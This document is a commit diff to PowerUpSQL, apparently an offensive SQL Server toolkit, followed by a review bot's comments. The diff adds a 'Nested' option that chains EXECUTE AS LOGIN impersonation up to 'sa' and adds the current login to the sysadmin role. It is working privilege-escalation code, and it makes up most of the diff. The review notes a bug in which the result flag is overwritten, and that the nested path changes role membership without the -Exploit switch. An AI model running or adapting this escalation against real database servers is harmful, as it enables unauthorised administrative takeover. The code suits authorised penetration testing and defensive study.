
Commit 9923d9b

authored
Merge pull request #34 from D00MFist/master
Added Nested Flag to Invoke-SQLAuditPrivImpersonateLogin
2 parents a32b738 + 690b788 commit 9923d9b


1 file changed

+45
-1
lines changed


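--- a/PowerUpSQL.ps1
+++ b/PowerUpSQL.ps1
@@ -22642,6 +22642,8 @@ Function Invoke-SQLAuditPrivImpersonateLogin
 Don't output anything.
 .PARAMETER Exploit
 Exploit vulnerable issues
+.PARAMETER Nested
+Exploit Nested Impersonation Capabilites
 .EXAMPLE
 PS C:\> Invoke-SQLAuditPrivImpersonateLogin -Instance SQLServer1\STANDARDDEV2014 -Username evil -Password Password123!
 
@@ -22705,7 +22707,11 @@ Function Invoke-SQLAuditPrivImpersonateLogin
 
 [Parameter(Mandatory = $false,
 HelpMessage = 'Exploit vulnerable issues.')]
-[switch]$Exploit
+[switch]$Exploit,
+
+[Parameter(Mandatory = $false,
+HelpMessage = 'Exploit Nested Impersonation Capabilites.')]
+[switch]$Nested
 )
 
 Begin
@@ -22857,6 +22863,44 @@ Function Invoke-SQLAuditPrivImpersonateLogin
 Write-Verbose -Message "$Instance : - EXPLOITING: The current login ($CurrentLogin) is already a sysadmin. No privilege escalation needed."
 $Exploited = 'No'
 }
+}
+# ---------------------------------------------------------------
+# Exploit Nested Impersonation Vulnerability
+# ---------------------------------------------------------------
+if($Nested)
+{
+# Status user
+Write-Verbose -Message "$Instance : - EXPLOITING: Starting Nested Impersonation exploit process (under assumption to levels of nesting and 1st first can impersonate sa)..."
+
+# Check if user is already a sysadmin
+$SysadminPreCheck = Get-SQLQuery -Instance $Instance -Username $Username -Password $Password -Credential $Credential -Query "SELECT IS_SRVROLEMEMBER('sysadmin','$CurrentLogin') as Status" -SuppressVerbose | Select-Object -Property Status -ExpandProperty Status
+if($SysadminPreCheck -eq 0)
+{
+# Status user
+Write-Verbose -Message "$Instance : - EXPLOITING: Verified that the current user ($CurrentLogin) is NOT a sysadmin."
+Write-Verbose -Message "$Instance : - EXPLOITING: Attempting to add the current user ($CurrentLogin) to the sysadmin role..."
+
+# Attempt to add the current login to sysadmins fixed server role
+$null = Get-SQLQuery -Instance $Instance -Username $Username -Password $Password -Credential $Credential -Query "EXECUTE AS LOGIN = '$ImpersonatedLogin';EXECUTE AS LOGIN = 'sa';EXEC sp_addsrvrolemember '$CurrentLogin','sysadmin'"
+
+# Verify the login was added successfully
+$SysadminPostCheck = Get-SQLQuery -Instance $Instance -Username $Username -Password $Password -Credential $Credential -Query "SELECT IS_SRVROLEMEMBER('sysadmin','$CurrentLogin') as Status" -SuppressVerbose | Select-Object -Property Status -ExpandProperty Status
+if($SysadminPostCheck -eq 1)
+{
+Write-Verbose -Message "$Instance : - EXPLOITING: It was possible to make the current user ($CurrentLogin) a sysadmin!"
+$Exploited = 'Yes'
+}
+else
+{
+Write-Verbose -Message "$Instance : - EXPLOITING: It was not possible to make the current user ($CurrentLogin) a sysadmin."
+}
+}
+else
+{
+# Status user
+Write-Verbose -Message "$Instance : - EXPLOITING: The current login ($CurrentLogin) is already a sysadmin. No privilege escalation needed."
+$Exploited = 'No'
+}
 }
 }
 else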
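Review bot: The `if($Nested)` block added in the third hunk runs after the `if($Exploit)` block and unconditionally reassigns `$Exploited`, so a call with both `-Exploit` and `-Nested` where the first escalation succeeds ends with the nested pre-check finding the login already in sysadmin and overwriting the result with `$Exploited = 'No'`. Guarding the new block with `if($Nested -and $Exploited -ne 'Yes')`, or leaving `$Exploited` untouched in the already-sysadmin branch, preserves the earlier outcome; which of the two is right depends on how `$Exploited` is initialised outside the hunk. The nested path also changes server role membership without requiring `-Exploit`, which the help text documents as the switch that exploits rather than reports; if that is unintended, `if($Exploit -and $Nested)` keeps an audit run with `-Nested` alone from modifying the instance. The new help and verbose text has typos (`Capabilites`, and `(under assumption to levels of nesting and 1st first can impersonate sa)` is hard to parse); `(assumes two levels of nesting and that the first impersonated login can impersonate sa)` would read better. Invoke-SQLAuditPrivImpersonateLogin begins and ends outside the hunk.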
